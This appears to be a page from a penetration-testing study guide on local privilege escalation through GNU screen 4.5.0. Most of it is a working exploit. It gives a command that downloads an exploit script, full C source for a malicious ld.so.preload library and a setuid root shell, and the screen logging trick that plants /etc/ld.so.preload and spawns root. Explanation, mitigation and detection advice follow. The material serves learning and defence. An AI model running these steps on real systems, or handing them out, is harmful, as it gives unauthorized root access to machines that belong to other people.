11.Vulnerable-services

Check screen version

screen -v

Download the exploit script (if you don't have it)

wget https://raw.githubusercontent.com/infernusinvictus/linux-exploit-suggestions/master/screen-4.5.0/screen_exploit.sh # or the location of your exploit.

Make the script executable

chmod +x screen_exploit.sh

Run the exploit (replace ~ with the target user's home directory)

./screen_exploit.sh ~ gnu/screenroot ~

If the script doesn't work directly, try the commands manually:

1. Create libhax.c

cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>

__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

2. Compile libhax.c

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

3. Create rootshell.c

cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>

int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF

4. Compile rootshell.c

gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration

5. Create /etc/ld.so.preload

cd /etc
umask 000 # Very important!
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # Newline is crucial

6. Trigger the exploit

screen -ls

7. Execute the root shell

/tmp/rootshell

Cleanup (always a good idea)

rm /tmp/libhax.so
rm /tmp/rootshell
rm /etc/ld.so.preload # Sometimes the exploit does not remove it.

Vulnerability:

  • Version 4.5.0 and below: The screen utility in these versions lacks proper permission checks when creating or truncating log files.

  • Arbitrary File Write: This allows an attacker to write to or create files with root privileges, leading to privilege escalation.

  • ld.so.preload Abuse: The exploit leverages this vulnerability to manipulate the ld.so.preload file, which specifies shared libraries to load before others. By pointing it to a malicious library, arbitrary code can be executed with root privileges.

Exploitation Steps (as shown in the script):

  1. Create Malicious Library (libhax.so):

    • A C library is created that, upon loading, changes the ownership and permissions of a shell executable (/tmp/rootshell) to root and sets the SUID bit.

    • It also removes the ld.so.preload file to clean up.

  2. Create Root Shell (rootshell):

    • A simple C program is created that spawns a root shell using setuid(0) and related functions.

  3. Create ld.so.preload:

    • The script uses screen's logging feature to write the path to the malicious library (/tmp/libhax.so) into /etc/ld.so.preload. The umask 000 is very important, as it ensures that the file is created with the needed permissions.

  4. Trigger the Vulnerability:

    • Running screen -ls triggers the vulnerability. Because screen is a SUID binary, when it runs, it loads the ld.so.preload library, and the code within the library executes.

  5. Root Shell:

    • The malicious library changes the permissions of /tmp/rootshell, and the script then executes it, providing a root shell.

Key Points and Considerations:

  • SUID Binaries: The exploit relies on screen being a SUID binary. This is a common requirement for many privilege escalation exploits.

  • ld.so.preload: Understanding how ld.so.preload works is crucial for understanding this exploit. It is a powerful but dangerous feature.

  • Clean Up: The exploit includes steps to clean up after itself, such as removing the malicious library and ld.so.preload. This is good practice but not always guaranteed.

  • Mitigation:

    • Update screen: The primary mitigation is to update to a patched version of screen.

    • Remove SUID bit: If updating is not possible, removing the SUID bit from screen will prevent this exploit, but it may break functionality.

    • File System Permissions: Proper file system permissions can help prevent unauthorized modification of critical system files.

  • Real-World Scenarios: This exploit is a good example of how seemingly minor vulnerabilities can lead to significant security breaches.

  • Exploit variations: There are slight variations of this exploit. For example, instead of removing the preload file, the malicious library may replace its content with a blank line.

  • Detection: This type of exploit can be detected by monitoring changes to /etc/ld.so.preload and by detecting suspicious SUID binaries. Monitoring for unexpected root shells is also important.

  • Containerization: In containerized environments, this vulnerability may be less impactful, as the container's root user is typically isolated from the host's root user. However, container escape vulnerabilities can still occur.

Previous4.Service-based Privilege EscalationNext12.Cron-job-abuse

Last updated